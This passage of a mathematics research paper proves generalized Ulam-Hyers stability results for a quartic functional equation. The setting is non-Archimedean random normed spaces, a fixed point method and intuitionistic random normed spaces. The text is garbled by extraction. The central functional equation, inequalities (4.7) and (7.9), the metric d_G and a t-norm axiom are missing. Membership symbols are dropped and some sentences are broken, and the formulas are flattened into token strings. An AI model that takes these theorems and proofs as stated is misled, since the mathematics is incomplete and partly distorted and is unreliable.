$( X , | | . | | )$ be is a non-Archimedean normed linear space. Define\n\n$μ x ( t ) = t t + | | x | | , ∀ x ∈ X t > 0 .$\n\nThen $( X , μ , T M )$ is a non-Archimedean RN-space.\n\nDefinition 3.3. Let $( X , μ , T )$ be a non-Archimedean RN-space. Let {x n } be a sequence in $X$. Then {x n } is said to be convergent if there exists $x∈X$ such that\n\n$lim n → ∞ μ x n - x ( t ) = 1$\n\nfor all t > 0. In that case, x is called the limit of the sequence {x n }.\n\nA sequence {x n } in $X$ is called Cauchy if for each ε > 0 and each t > 0 there exists n0 such that for all nn0 and all p > 0 we have $μ x n + p - x n ( t ) >1-ε$.\n\nIf each Cauchy sequence is convergent, then the random norm is said to be complete and the non-Archimedean RN-space is called a non-Archimedean random Banach space.\n\nRemark 3.4. Let $( X , μ , T M )$ be a non-Archimedean RN-space, then\n\n$μ x n + p - x n ( t ) ≥ min { μ x n + j + 1 - x n + j ( t ) : j = 0 , 1 , 2 , … , p - 1 }$\n\nSo, the sequence {x n } is Cauchy if for each ε > 0 and t > 0 there exists n0 such that for all nn0 we have\n\n$μ x n + 1 - x n ( t ) > 1 - ε .$\n\n## 4. Generalized Ulam-Hyers stability for a quartic functional equation in non-Archimedean RN-spaces\n\nLet $K$ be a non-Archimedean field, $X$ a vector space over $K$ and let $( Y , μ , T )$ be a non-Archimedean random Banach space over $K$.\n\nWe investigate the stability of the quartic functional equation\n\nwhere f is a mapping from $X$ to $Y$ and f(0) = 0.\n\nNext, we define a random approximately quartic mapping. Let Ψ be a distribution function on $X×X× [ 0 , ∞ ]$ such that Ψ (x, y, ·) is symmetric, nondecreasing and\n\n$Ψ ( c x , c x , t ) ≥ Ψ x , x , t | c | ( x ∈ X , c ≠ 0 ) .$\n\nDefinition 4.1. A mapping $f:X→Y$ is said to be Ψ-approximately quartic if\n\n$μ 1 6 f ( x + 4 y ) + f ( 4 x - y ) - 3 0 6 9 f x + y 3 + f ( x + 2 y ) - 1 3 6 f ( x - y ) + 1 3 9 4 f ( x + y ) - 4 2 5 f ( y ) + 1 5 3 0 f ( x ) ( t ) ≥ Ψ ( x , y , t ) ( x , y ∈ X , t > 0 ) .$\n(4.1)\n\nIn this section, we assume that 4 ≠ 0 in $K$ (i.e., characteristic of $K$ is not 4). Our main result, in this section, is the following:\n\nTheorem 4.2. Let $K$ be a non-Archimedean field, $X$ a vector space over $K$ and let $( Y , μ , T )$ be a non-Archimedean random Banach space over $K$. Let $f:X→Y$ be a Ψ-approximately quartic mapping. If for some α , α > 0, and some integer k, k > 3 with |4k| < α,\n\n$Ψ ( 4 - k x , 4 - k y , t ) ≥ Ψ ( x , y , α t ) ( x ∈ X , t > 0 )$\n(4.2)\n\nand\n\n$lim n → ∞ T j = n ∞ M x , α j t | 4 | k j = 1 ( x ∈ X , t > 0 ) ,$\n(4.3)\n\nthen there exists a unique quartic mapping $Q:X→Y$ such that\n\n$μ f ( x ) - Q ( x ) ( t ) ≥ T i = 1 ∞ M x , α i + 1 t | 4 | k i$\n(4.4)\n\nfor all x X and t > 0, where\n\n$M ( x , t ) : = T ( Ψ ( x , 0 , t ) , Ψ ( 4 x , 0 , t ) , ⋯ , Ψ ( 4 k - 1 x , 0 , t ) ) ( x ∈ X , t > 0 ) .$\n\nProof. First, we show by induction on j that for each $x∈X$, t > 0 and j ≥ 1,\n\n$μ f ( 4 j x ) - 2 5 6 j f ( x ) ( t ) ≥ M j ( x , t ) : = T ( Ψ ( x , 0 , t ) , ⋯ , Ψ ( 4 j - 1 x , 0 , t ) ) .$\n(4.5)\n\nPutting y = 0 in (4.1), we obtain\n\n$μ f ( 4 x ) - 2 5 6 f ( x ) ( t ) ≥ Ψ ( x , 0 , t ) ( x ∈ X , t > 0 ) .$\n\nThis proves (4.5) for j = 1. Assume that (4.5) holds for some j ≥ 1. Replacing y by 0 and x by 4jx in (4.1), we get\n\n$μ f ( 4 j + 1 x ) − 256 f ( 4 j x ) ( t ) ≥ Ψ ( 4 j x , 0 , t ) ( x ∈ X , t > 0 ) .$\n\nSince |256| ≤ 1,\n\n$μ f ( 4 j + 1 x ) − 256 j + 1 f ( x ) ( t ) ≥ T ( μ f ( 4 j + 1 x ) − 256 f ( 4 j x ) ( t ) , μ 256 f ( 4 j x ) − 256 j + 1 f ( x ) ( t ) ) = T ( μ f ( 4 j + 1 x ) − 256 f ( 4 j x ) ( t ) , μ f ( 4 j x ) − 256 j f ( x ) ( t | 256 | ) ) ≥ T ( μ f ( 4 j + 1 x ) − 256 f ( 4 j x ) ( t ) , μ f ( 4 j x ) − 256 j f ( x ) ( t ) ) ≥ T ( Ψ ( 4 j x , 0 , t ) , M j ( x , t ) ) = M j + 1 ( x , t )$\n\nfor all $x∈X$. Thus (4.5) holds for all j ≥ 1. In particular\n\n$μ f ( 4 k x ) − 256 k f ( x ) ( t ) ≥ M ( x , t ) ( x ∈ X , t > 0 ) .$\n(4.6)\n\nReplacing x by 4-(kn+k)x in (4.6) and using inequality (4.2), we obtain\n\n(4.7)\n\nThen\n\n$μ ( 4 4 k ) n f ( x ( 4 k ) n ) − ( 4 4 k ) n + 1 f ( x ( 4 k ) n + 1 ) ( t ) ≥ M ( x , α n + 1 | ( 4 4 k ) n | t ) ( x ∈ X , t > 0 , n = 0 , 1 , 2 , … ) .$\n\nHence,\n\n$μ ( 4 4 k ) n f ( x ( 4 k ) n ) − ( 4 4 k ) n + p f ( x ( 4 k ) n + p ) ( t ) ≥ T j = n n + p ( μ ( 4 4 k ) j f ( x ( 4 k ) j ) − ( 4 4 k ) j + p f ( x ( 4 k ) j + p ) ( t ) ) ≥ T j = n n + p M ( x , α j + 1 | ( 4 4 k ) j | t ) ≥ T j = n n + p M ( x , α j + 1 | ( 4 k ) j | t ) ( x ∈ X , t > 0 , n = 0 , 1 , 2 , … ) .$\n\nSince $lim n → ∞ T j = n ∞ M ( x , α j + 1 | ( 4 k ) j | t ) = 1 ( x ∈ X , t > 0 ) , { ( 4 4 k ) n f ( x ( 4 k ) n ) } n ∈ N$, is a Cauchy sequence in the non-Archimedean random Banach space $( Y , μ , T )$. Hence, we can define a mapping $Q:X→Y$ such that\n\n$lim n → ∞ μ ( 4 4 k ) n f ( x ( 4 k ) n ) − Q ( x ) ( t ) = 1 ( x ∈ X , t > 0 ) .$\n(4.8)\n\nNext, for each n ≥ 1, $x∈X$ and t > 0,\n\n$μ f ( x ) − ( 4 4 k ) n f ( x ( 4 k ) n ) ( t ) = μ ∑ i = 0 n − 1 ( 4 4 k ) i f ( x ( 4 k ) i ) − ( 4 4 k ) i + 1 f ( x ( 4 k ) i + 1 ) ( t ) ≥ T i = 0 n − 1 ( μ ( 4 4 k ) i f ( x ( 4 k ) i ) − ( 4 4 k ) i + 1 f ( x ( 4 k ) i + 1 ) ( t ) ) ≥ T i = 0 n − 1 M ( x , α i + 1 t | 4 4 k | i ) .$\n\nTherefore,\n\n$μ f ( x ) − Q ( x ) ( t ) ≥ T ( μ f ( x ) − ( 4 4 k ) n f ( x ( 4 k ) n ) ( t ) , μ ( 4 4 k ) n f ( x ( 4 k ) n ) − Q ( x ) ( t ) ) ≥ T ( T i = 0 n − 1 M ( x , α i + 1 t | 4 4 k | i ) , μ ( 4 4 k ) n f ( x ( 4 k ) n ) − Q ( x ) ( t ) ) .$\n\nBy letting n → ∞, we obtain\n\n$μ f ( x ) - Q ( x ) ( t ) ≥ T i = 1 ∞ M x , α i + 1 t | 4 k | i .$\n\nThis proves (4.4).\n\nAs T is continuous, from a well-known result in probabilistic metric space (see e.g., [, Chapter 12]), it follows that\n\n$lim n → ∞ μ ( 4 k ) n ⋅ 16 f ( 4 − k n ( x + 4 y ) ) + ( 4 k ) n f ( 4 − k n ( 4 x − y ) ) − 306 [ ( 4 k ) n ⋅ 9 f ( 4 − k n ( x + y 3 ) ) + ( 4 k ) n f ( 4 − k n ( x + 2 y ) ) ] − 136 ( 4 k ) n f ( 4 − k n ( x − y ) ) + 1394 ( 4 k ) n f ( 4 − k n ( x + y ) ) − 425 ( 4 k ) n f ( 4 − k n y ) + 1530 ( 4 k ) n f ( 4 − k n x ) ( t ) = μ 16 Q ( x + 4 y ) + Q ( 4 x − y ) − 306 [ 9 Q ( x + y 3 ) + Q ( x + 2 y ) ] − 136 Q ( x − y ) + 1394 Q ( x + y ) − 425 Q ( y ) + 1530 Q ( x ) ( t )$\n\nfor almost all t > 0.\n\nOn the other hand, replacing x, y by 4-knx, 4-kny, respectively, in (4.1) and using (NA-RN2) and (4.2), we get\n\n$μ ( 4 k ) n ⋅ 16 f ( 4 − k n ( x + 4 y ) ) + ( 4 k ) n f ( 4 − k n ( 4 x − y ) ) − 306 [ ( 4 k ) n ⋅ 9 f ( 4 − k n ( x + y 3 ) ) + ( 4 k ) n f ( 4 − k n ( x + 2 y ) ) ] − 136 ( 4 k ) n f ( 4 − k n ( x − y ) ) + 1394 ( 4 k ) n f ( 4 − k n ( x + y ) ) − 425 ( 4 k ) n f ( 4 − k n y ) + 1530 ( 4 k ) n f ( 4 − k n x ) ( t ) ≥ Ψ ( 4 − k n x ,4 − k n y , t | 4 k | n ) ≥ Ψ ( x , y , α n t | 4 k | n )$\n\nfor all $x,y∈X$ and all t > 0. Since $lim n → ∞ Ψ x , y , α n t | 4 k | n =1$, we infer that Q is a quartic mapping.\n\nIf $Q ′ :X→Y$ is another quartic mapping such that μQ'(x)-f(x)(t) ≥ M(x, t) for all $x∈X$ and t > 0, then for each n N, $x∈X$ and t > 0,\n\n$μ Q ( x ) − Q ′ ( x ) ( t ) ≥ T ( μ Q ( x ) − ( 4 4 k ) n f ( x ( 4 k ) n ) ( t ) , μ ( 4 4 k ) n f ( x ( 4 k ) n ) − Q ′ ( x ) ( t ) , t ) ) .$\n\nThanks to (4.8), we conclude that Q = Q'. □\n\nCorollary 4.3. Let $K$ be a non-Archimedean field, $X$ a vector space over $K$ and let $( Y , μ , T )$ be a non-Archimedean random Banach space over $K$ under a t-norm $T∈H$. Let $f:X→Y$ be a Ψ-approximately quartic mapping. If, for some α , α > 0, and some integer k, k > 3, with |4k| < α,\n\n$Ψ ( 4 - k x , 4 - k y , t ) ≥ Ψ ( x , y , α t ) ( x ∈ X , t > 0 ) ,$\n\nthen there exists a unique quartic mapping $Q:X→Y$ such that\n\n$μ f ( x ) - Q ( x ) ( t ) ≥ T i = 1 ∞ M x , α i + 1 t | 4 | k i$\n\nfor all $x∈X$ and all t > 0, where\n\n$M ( x , t ) : = T ( Ψ ( x , 0 , t ) , Ψ ( 4 x , 0 , t ) , ⋯ , Ψ ( 4 k - 1 x , 0 , t ) ) ( x ∈ X , t > 0 ) .$\n\nProof. Since\n\n$lim n → ∞ M x , α j t | 4 | k j = 1 ( x ∈ X , t > 0 )$\n\nand T is of Hadžić type, from Proposition 2.1, it follows that\n\n$lim n → ∞ T j = n ∞ M x , α j t | 4 | k j = 1 ( x ∈ X , t > 0 ) .$\n\nNow we can apply Theorem 4.2 to obtain the result. □\n\nExample 4.4. Let $( X , μ , T M )$ non-Archimedean random normed space in which\n\n$μ x ( t ) = t t + | | x | | , ∀ x ∈ X , t > 0 ,$\n\nand $( Y , μ , T M )$ a complete non-Archimedean random normed space (see Example 3.2). Define\n\n$Ψ ( x , y , t ) = t 1 + t .$\n\nIt is easy to see that (4.2) holds for α = 1. Also, since\n\n$M ( x , t ) = t 1 + t ,$\n\nwe have\n\n$lim n → ∞ T M , j = n ∞ M x , α j t | 4 | k j = lim n → ∞ lim m → ∞ T M , j = n m M x , t | 4 | k j (1) = lim n → ∞ lim m → ∞ t t + | 4 k | n (2) = 1 , ∀ x ∈ X , t > 0 . (3) (4)$\n\nLet $f:X→Y$ be a Ψ-approximately quartic mapping. Thus all the conditions of Theorem 4.2 hold and so there exists a unique quartic mapping $Q:X→Y$ such that\n\n$μ f ( x ) - Q ( x ) ( t ) ≥ t t + | 4 k | .$\n\n## 5. Fixed point method for random stability of the quartic functional equation\n\nIn this section, we apply a fixed point method for achieving random stability of the quartic functional equation. The notion of generalized metric space has been introduced by Luxemburg , by allowing the value +∞ for the distance mapping. The following lemma (Luxemburg-Jung theorem) will be used in the proof of Theorem 5.3.\n\nLemma 5.1. . Let (X, d) be a complete generalized metric space and let A : XX be a strict contraction with the Lipschitz constant k such that d(x0, A(x0)) < +∞ for some x0 X. Then A has a unique fixed point in the set Y := {y X, d(x0, y) < ∞} and the sequence (An(x))nNconverges to the fixed point x* for every x Y. Moreover, d(x0, A(x0)) ≤ δ implies $d ( x * , x 0 ) ≤ δ 1 - k$.\n\nLet X be a linear space, (Y, ν, T M ) a complete RN-space and let G be a mapping from X × R into [0, 1], such that G(x, .) D+ for all x. Consider the set E := {g : XY, g(0) = 0} and the mapping d G defined on E × E by\n\nwhere, as usual, inf = +∞. The following lemma can be proved as in :\n\nLemma 5.2. cf. [22, 39] d G is a complete generalized metric on E.\n\nTheorem 5.3. Let X be a real linear space, t f a mapping from X into a complete RN-space (Y, μ , T M ) with f(0) = 0 and let Φ : X2D+ be a mapping with the property\n\n$∃ α ∈ ( 0 , 2 5 6 ) : Φ 4 x , 4 y ( α t ) ≥ Φ x , y ( t ) , ∀ x , y ∈ X , ∀ t > 0 .$\n(5.1)\n\nIf\n\n$μ 1 6 f ( x + 4 y ) + f ( 4 x - y ) - 3 0 6 9 f x + y 3 + f ( x + 2 y ) - 1 3 6 f ( x - y ) + 1 3 9 4 f ( x + y ) - 4 2 5 f ( y ) + 1 5 3 0 f ( x ) ( t ) ≥ Φ x , y ( t ) , ∀ x , y ∈ X ,$\n(5.2)\n\nthen there exists a unique quartic mapping g : XY such that\n\n$μ g ( x ) - f ( x ) ( t ) ≥ Φ x , 0 M t , ∀ x ∈ X , ∀ t > 0 ,$\n(5.3)\n\nwhere\n\n$M = ( 2 5 6 - α ) .$\n\nMoreover,\n\n$g ( x ) = lim n → ∞ f ( 4 n x ) 4 4 n .$\n\nProof. By setting y = 0 in (5.2), we obtain\n\n$μ f ( 4 x ) - 2 5 6 f ( x ) ( t ) ≥ Φ x , 0 ( t )$\n\nfor all x X, whence\n\n$μ 1 2 5 6 f ( 4 x ) - f ( x ) ( t ) = μ 1 2 5 6 ( f ( 4 x ) - 2 5 6 f ( x ) ) ( t ) (1) = μ f ( 4 x ) - 2 5 6 f ( x ) 2 5 6 t (2) ≥ Φ x , 0 2 5 6 t , ∀ x ∈ X , ∀ t > 0 . (3) (4)$\n\nLet\n\n$G ( x , t ) : = Φ x , 0 2 5 6 t .$\n\nConsider the set\n\n$E : = { g : X → Y , g ( 0 ) = 0 }$\n\nand the mapping d G defined on E × E by\n\nBy Lemma 5.2, (E, d G ) is a complete generalized metric space. Now, let us consider the linear mapping J : EE,\n\n$J g ( x ) : = 1 2 5 6 g ( 4 x ) .$\n\nWe show that J is a strictly contractive self-mapping of E with the Lipschitz constant k = α/256.\n\nIndeed, let g, h E be mappings such that d G (g, h) < ε. Then\n\n$μ g ( x ) - h ( x ) ( ε t ) ≥ G ( x , t ) , ∀ x ∈ X , ∀ t > 0 ,$\n\nwhence\n\n$μ J g ( x ) - J h ( x ) ( α 2 5 6 ε t ) = μ 1 2 5 6 ( g ( 4 x ) - h ( 4 x ) ) ( α 2 5 6 ε t ) (1) = μ g ( 4 x ) - h ( 4 x ) ( α ε t ) (2) ≥ G ( 4 x , α t ) ( x ∈ X , t > 0 ) . (3) (4)$\n\nSince G(4x, αt) ≥ G(x, t), $μ J g ( x ) - J h ( x ) ( α 2 5 6 ε t ) ≥G ( x , t )$, that is,\n\n$d G ( g , h ) < ε ⇒ d G ( J g , J h ) ≤ α 2 5 6 ε .$\n\nThis means that\n\n$d G ( J g , J h ) ≤ α 2 5 6 d G ( g , h )$\n\nfor all g, h in E.\n\nNext, from\n\n$μ f ( x ) - 1 2 5 6 f ( 4 x ) ( t ) ≥ G ( x , t )$\n\nit follows that d G (f, Jf ) ≤ 1. Using the Luxemburg-Jung theorem, we deduce the existence of a fixed point of J, that is, the existence of a mapping g : XY such that g(4x) = 256g(x) for all x X.\n\nSince, for any x X and t > 0,\n\n$d G ( u , v ) < ε ⇒ μ u ( x ) - v ( x ) ( t ) ≥ G x , t ε ,$\n\nfrom d G (Jnf, g) → 0, it follows that $lim n → ∞ f ( 4 n x ) 4 4 n =g ( x )$ for any x X.\n\nAlso, $d G ( f , g ) ≤ 1 1 - L d ( f , J f )$ implies the inequality $d G ( f , g ) ≤ 1 1 - α 2 5 6$ from which it immediately follows $ν g ( x ) - f ( x ) ( 2 5 6 2 5 6 - α t ) ≥G ( x , t )$ for all t > 0 and all x X. This means that\n\n$μ g ( x ) - f ( x ) ( t ) ≥ G x , 2 5 6 - α 2 5 6 t , ∀ x ∈ X , ∀ t > 0 .$\n\nIt follows that\n\n$μ g ( x ) - f ( x ) ( t ) ≥ Φ x , 0 ( ( 2 5 6 - α ) t ) ∀ x ∈ X , ∀ t > 0 .$\n\nThe uniqueness of g follows from the fact that g is the unique fixed point of J with the property: there is C (0, ∞) such that μg(x)-f(x)(Ct) ≥ G(x, t) for all x X and all t > 0, as desired. □\n\n## 6. Intuitionistic random normed spaces\n\nRecently, the notation of intuitionistic random normed space introduced by Chang et al. . In this section, we shall adopt the usual terminology, notations, and conventions of the theory of intuitionistic random normed spaces as in , , , , , , .\n\nDefinition 6.1. A measure distribution function is a function μ : R → [0, 1] which is left continuous, non-decreasing on R, inftRμ(t) = 0 and suptRμ(t) = 1.\n\nWe will denote by D the family of all measure distribution functions and by H a special element of D defined by\n\n$H ( t ) = 0 , if t ≤ 0 , 1 , if t > 0 .$\n\nIf X is a nonempty set, then μ : XD is called a probabilistic measure on X and μ (x) is\n\ndenoted by μ x .\n\nDefinition 6.2. A non-measure distribution function is a function ν : R → [0, 1] which is right continuous, non-increasing on R, inftRν(t) = 0 and suptRν(t) = 1.\n\nWe will denote by B the family of all non-measure distribution functions and by G a special element of B defined by\n\n$G ( t ) = 1 , if t ≤ 0 , 0 , if t > 0 .$\n\nIf X is a nonempty set, then ν : XB is called a probabilistic non-measure on X and ν (x) is denoted by ν x .\n\nLemma 6.3. , Consider the set L* and operation $≤ L *$ defined by:\n\n$L * = { ( x 1 , x 2 ) : ( x 1 , x 2 ) ∈ [ 0 , 1 ] 2 a n d x 1 + x 2 ≤ 1 } , ( x 1 , x 2 ) ≤ L * ( y 1 , y 2 ) ⇔ x 1 ≤ y 1 , x 2 ≥ y 2 , ∀ ( x 1 , x 2 ) , ( y 1 , y 2 ) ∈ L * .$\n\nThen $( L * , ≤ L * )$ is a complete lattice.\n\nWe denote its units by $0 L * = ( 0 , 1 )$ and $1 L * = ( 1 , 0 )$. In Section 2, we presented classical t-norm. Using the lattice $( L * , ≤ L * )$, these definitions can be straightforwardly extended.\n\nDefinition 6.4. A triangular norm (t-norm) on L* is a mapping $T: ( L * ) 2 → L *$ satisfying the following conditions:\n\n1. (a)\n\n$( ∀ x ∈ L * ) ( T ( x , 1 L * ) = x )$ (boundary condition);\n\n2. (b)\n\n$( ∀ ( x , y ) ∈ ( L * ) 2 ) ( T ( x , y ) = T ( y , x ) )$ (commutativity);\n\n3. (c)\n\n$( ∀ ( x , y , z ) ∈ ( L * ) 3 ) ( T ( x , T ( y , z ) ) = T ( T ( x , y ) , z ) )$ (associativity);\n\n4. (d)\n\n(monotonicity).\n\nIf $( L * , ≤ L * , T )$ is an Abelian topological monoid with unit $1 L *$, then $T$ is said to be a continuous t-norm.\n\nDefinition 6.5. A continuous t-norm $T$ on L* is said to be continuous t-representable if there exist a continuous t-norm * and a continuous t-conorm on [0, 1] such that, for all x = (x1, x2), y = (y1, y2) L*,\n\n$T ( x , y ) = ( x 1 * y 1 , x 2 ♢ y 2 ) .$\n\nFor example,\n\n$T ( a , b ) = ( a 1 b 1 , min { a 2 + b 2 , 1 } )$\n\nand\n\n$M ( a , b ) = ( min { a 1 , b 1 } , max { a 2 , b 2 } )$\n\nare continuous t-representable for all a = (a1, a2), b = (b1, b2) L*.\n\nNow, we define a sequence $T n$ recursively by $T 1 =T$ and\n\n$T n ( x ( 1 ) , … , x ( n + 1 ) ) = T ( T n - 1 ( x ( 1 ) , … , x ( n ) ) , x ( n + 1 ) ) , ∀ n ≥ 2 , x ( i ) ∈ L * .$\n\nDefinition 6.6. A negator on L* is any decreasing mapping $N: L * → L *$ satisfying $N ( 0 L * ) = 1 L *$and $N ( 1 L * ) = 0 L *$. If $N ( N ( x ) ) =x$ for all x L*, then $N$ is called an involutive negator. A negator on [0, 1] is a decreasing function N : [0, 1] → [0, 1] satisfying N(0) = 1 and N(1) = 0. N s denotes the standard negator on [0, 1] defined by\n\n$N s ( x ) = 1 - x , ∀ x ∈ [ 0 , 1 ] .$\n\nDefinition 6.7. Let μ and ν be measure and non-measure distribution functions from X × (0, +∞) to [0, 1] such that μ x (t) + ν x (t) ≤ 1 for all x X and t > 0. The triple $( X , P μ , ν , T )$ is said to be an intuitionistic random normed space (briefly IRN-space) if X is a vector space, $T$ is continuous t-representable and $P μ , ν$ is a mapping X × (0, +∞) → L* satisfying the following conditions: for all x, y X and t, s > 0,\n\n1. (a)\n\n$P μ , ν ( x , 0 ) = 0 L *$;\n\n2. (b)\n\n$P μ , ν ( x , t ) = 1 L *$ if and only if x = 0;\n\n3. (c)\n\n$P μ , ν ( α x , t ) = P μ , ν ( x , t | α | )$ for all α ≠ 0;\n\n4. (d)\n\n$P μ , ν ( x + y , t + s ) ≥ L * T ( P μ , ν ( x , t ) , P μ , ν ( y , s ) )$.\n\nIn this case, $P μ , ν$ is called an intuitionistic random norm. Here,\n\n$P μ , ν ( x , t ) = ( μ x ( t ) , ν x ( t ) ) .$\n\nExample 6.8. Let (X, || · ||) be a normed space. Let $T ( a , b ) = ( a 1 b 1 , min ( a 2 + b 2 , 1 ) )$ for all a = (a1, a2), b = (b1, b2) L* and let μ, ν be measure and non-measure distribution functions defined by\n\n$P μ , ν ( x , t ) = ( μ x ( t ) , ν x ( t ) ) = t t + | | x | | , | | x | | t + | | x | | , ∀ t ∈ R + .$\n\nThen $( X , P μ , ν , T )$ is an IRN-space.\n\nDefinition 6.9. (1) A sequence {x n } in an IRN-space $( X , P μ , ν , T )$ is called a Cauchy sequence if, for any ε > 0 and t > 0, there exists an n0 such that\n\n$P μ , ν ( x n - x m , t ) > L * ( N s ( ε ) , ε ) , ∀ n , m ≥ n 0 ,$\n\nwhere N s is the standard negator.\n\n1. (2)\n\nThe sequence {x n } is said to be convergent to a point x X (denoted by$x n → P μ , ν x$) if $P μ , ν ( x n - x , t ) → 1 L *$ as n → ∞ for every t > 0.\n\n2. (3)\n\nAn IRN-space $( X , P μ , ν , T )$ is said to be complete if every Cauchy sequence in X is convergent to a point x X.\n\n## 7. Stability results in intuitionistic random normed spaces\n\nIn this section, we prove the generalized Ulam-Hyers stability of the quartic functional equation in intuitionistic random normed spaces.\n\nTheorem 7.1. Let X be a linear space and let $( X , P μ , ν , T )$ be a complete IRN-space. Let f : XY be a mapping with f(0) = 0 for which there are ξ, ζ : X2D+, where ξ (x, y) is denoted by ξx,yand ζ(x, y)is denoted by ζx,y, further, (ξx,y(t), ζx,y(t)) is denoted by Qξ,ζ(x, y, t), with the property:\n\n$P μ , ν ( 16 f ( x + 4 y ) + f ( 4 x − y ) − 306 [ 9 f ( x + y 3 ) + f ( x + 2 y ) ] − 136 f ( x − y ) + 1394 f ( x + y ) − 425 f ( y ) + 1530 f ( x ) , t ) ≥ L * Q ξ , ζ ( x , y , t ) .$\n(7.1)\n\nIf\n\n$T i = 1 ∞ ( Q ξ , ζ ( 4 n + i - 1 x , 0 , 4 4 n + 3 i + 3 t ) ) = 1 L *$\n(7.2)\n\nand\n\n$lim n → ∞ Q ξ , ζ ( 4 n x , 4 n y , 4 4 n t ) = 1 L *$\n(7.3)\n\nfor all x, y X and all t > 0, then there exists a unique quartic mapping Q : XY such that\n\n$P μ , ν ( f ( x ) - Q ( x ) , t ) ≥ L * T i = 1 ∞ ( Q ξ , ζ ( 4 i - 1 x , 0 , 4 3 i + 3 t ) ) .$\n(7.4)\n\nProof. Putting y = 0 in (7.1), we have\n\n$P μ , ν f ( 4 x ) 2 5 6 - f ( x ) , t ≥ L * Q ξ , ζ ( x , 0 , 4 4 t ) .$\n(7.5)\n\nTherefore, it follows that\n\n$P μ , ν ( f ( 4 k + 1 x ) 4 4 ( k + 1 ) − f ( 4 k x ) 4 4 k , t 4 4 k ) ≥ L * Q ξ , ζ ( 4 k x ,0,4 4 t ) ,$\n(7.6)\n\nwhich implies that\n\n$A μ , ν ( f ( 4 k + 1 x ) 4 4 ( k + 1 ) − f ( 4 k x ) 4 4 k , t ) ≥ L * Q ξ , ζ ( 4 k x ,0,4 4 ( k + 1 ) t ) ,$\n(7.7)\n\nthat is,\n\n$P μ , ν f ( 4 k + 1 x ) 4 4 ( k + 1 ) - f ( 4 k x ) 4 4 k , t 4 k + 1 ≥ L * Q ξ , ζ ( 4 k x , 0 , 4 4 ( k + 1 ) t )$\n(7.8)\n\nfor all k N and all t > 0. As 1 > 1/4 + + 1/4n, from the triangle inequality, it follows\n\n(7.9)\n\nIn order to prove convergence of the sequence ${ f ( 4 n x ) 2 5 6 n }$, replacing x with 4mx in (7.9), we get that for m, n > 0\n\n$P μ , ν ( f ( 4 n + m x ) 2 5 6 ( n + m ) - f ( 4 m x ) 2 5 6 m , t ) ≥ L * T i = 1 n ( Q ξ , ζ ( 4 i + m - 1 x , 0 , 4 3 i + 4 m + 3 t ) ) .$\n(7.10)\n\nSince the right-hand side of the inequality tends 1L*as m tends to infinity, the sequence ${ f ( 4 n x ) 4 4 n }$ is a Cauchy sequence. So we may define $Q ( x ) = lim n → ∞ f ( 4 n x ) 4 4 n$ for all x X.\n\nNow, we show that Q is a quartic mapping. Replacing x, y with 4nx and 4ny, respectively, in (7.1), we obtain\n\n$P μ , ν ( f ( 4 n ( x + 4 y ) ) 256 n + f ( 4 n ( 4 x − y ) ) 256 n − 306 [ 9 f ( 4 n ( x + y 3 ) ) + f ( 4 n ( x + 2 y ) ) 256 n − 136 f ( 4 n ( x − y ) ) 256 n + 1394 f ( 4 n ( x + y ) ) 256 n − 425 f ( 4 n ( y ) ) 256 n + 1530 f ( 4 n ( x ) ) 256 n , t ) ≥ L * Q ξ , ζ ( 4 n x ,4 n y ,4 4 n t ) .$\n(7.11)\n\nTaking the limit as n → ∞, we find that Q satisfies (1.1) for all x, y X.\n\nTaking the limit as n → ∞ in (7.9), we obtain (7.4).\n\nTo prove the uniqueness of the quartic mapping Q subject to (7.4), let us assume that there exists another quartic mapping Q' which satisfies (7.4). Obviously, we have x X and all n . Hence it follows from (7.4) that\n\n$P μ , ν ( Q ( x ) − Q ′ ( x ) , t ) ≥ L * P μ , ν ( Q ( 4 n x ) − Q ′ ( 4 n x ) , 4 4 n t ) ≥ L * T ( P μ , ν ( Q ( 4 n x ) − f ( 4 n x ) , 4 4 n − 1 t ) , P μ , ν ( f ( 4 n x ) − Q ′ ( 4 n x ) , 4 4 n − 1 t ) ) ≥ L * T ( T i = 1 ∞ ( Q ξ , ζ ( 4 n + i − 1 x ,0,4 4 n + 3 i + 3 t ) ) , T i = 1 ∞ ( Q ξ , ζ ( 4 n + i − 1 x ,0,4 4 n + 3 i + 3 t ) )$\n\nfor all x X. By letting n → ∞ in (7.4), we prove the uniqueness of Q. This completes the proof of the uniqueness, as desired. □\n\nCorollary 7.2. Let $( X , P ′ μ ′ , ν ′ , T )$ be an IRN-space and let $( Y , P μ , ν , T )$ be a complete IRN-space. Let f : XY be a mapping such that\n\n$P μ , ν ( 16 f ( x + 4 y ) + f ( 4 x − y ) − 306 [ 9 f ( x + y 3 ) + f ( x + 2 y ) ] − 136 f ( x − y ) + 1394 f ( x + y ) − 425 f ( y ) + 1530 f ( x ) , t ) ≥ L * P ′ μ ′ , ν ′ ( x + y , t )$\n\nfor all t > 0 in which\n\n$lim n → ∞ T i = 1 ∞ ( P μ ′ , ν ′ ′ ( x , 4 4 n + 3 i + 3 t ) ) = 1 L *$\n\nfor all x, y X. Then there exists a unique quartic mapping Q : XY such that\n\n$P μ , ν ( f ( x ) - Q ( x ) , t ) ≥ L * T i = 1 ∞ ( P μ ′ , ν ′ ′ ( x , 4 3 i + 3 t ) ) .$\n\nNow, we give an example to illustrate the main result of Theorem 7.1 as follows.\n\nExample 7.3. Let (X, ||.||) be a Banach algebra, $( X , P μ , ν , M )$ an IRN-space in which\n\n$P μ , ν ( x , t ) = t t + | | x | | , | | x | | t + | | x | |$\n\nand let $( Y , P μ , ν , M )$ be a complete IRN-space for all x X. Define f : XX by f (x) = x4 + x0, where x0 is a unit vector in X. A straightforward computation shows that\n\n$P μ , ν ( 16 f ( x + 4 y ) + f ( 4 x − y ) − 306 [ 9 f ( x + y 3 ) + f ( x + 2 y ) ] − 136 f ( x − y ) + 1394 f ( x + y ) − 425 f ( y ) + 1530 f ( x ) , t ) ≥ L * P μ , ν ( x + y , t ) , ∀ t > 0 .$\n\nAlso\n\nTherefore, all the conditions of 7.1 hold and so there exists a unique quartic mapping Q : XY such that\n\n$P μ , ν ( f ( x ) - Q ( x ) , t ) ≥ L * P μ , ν ( x , 4 6 t ) .$\n\n## References\n\n1. 1.\n\nUlam SM: Problems in Modern Mathematics. In Science Editions. Volume Chapter VI. Wiley, New York; 1964.\n\n2. 2.\n\nHyers DH: On the stability of the linear functional equation. Proc Natl Acad Sci USA 1941, 27: 222–224. 10.1073/pnas.27.4.222\n\n3. 3.\n\nAoki T: On the stability of the linear transformation in Banach spaces. J Math Soc Jpn 1950, 2: 64–66. 10.2969/jmsj/00210064\n\n4. 4.\n\nRassias ThM: On the stability of the linear mapping in Banach spaces. Proc Am Math Soc 1978, 72: 297–300. 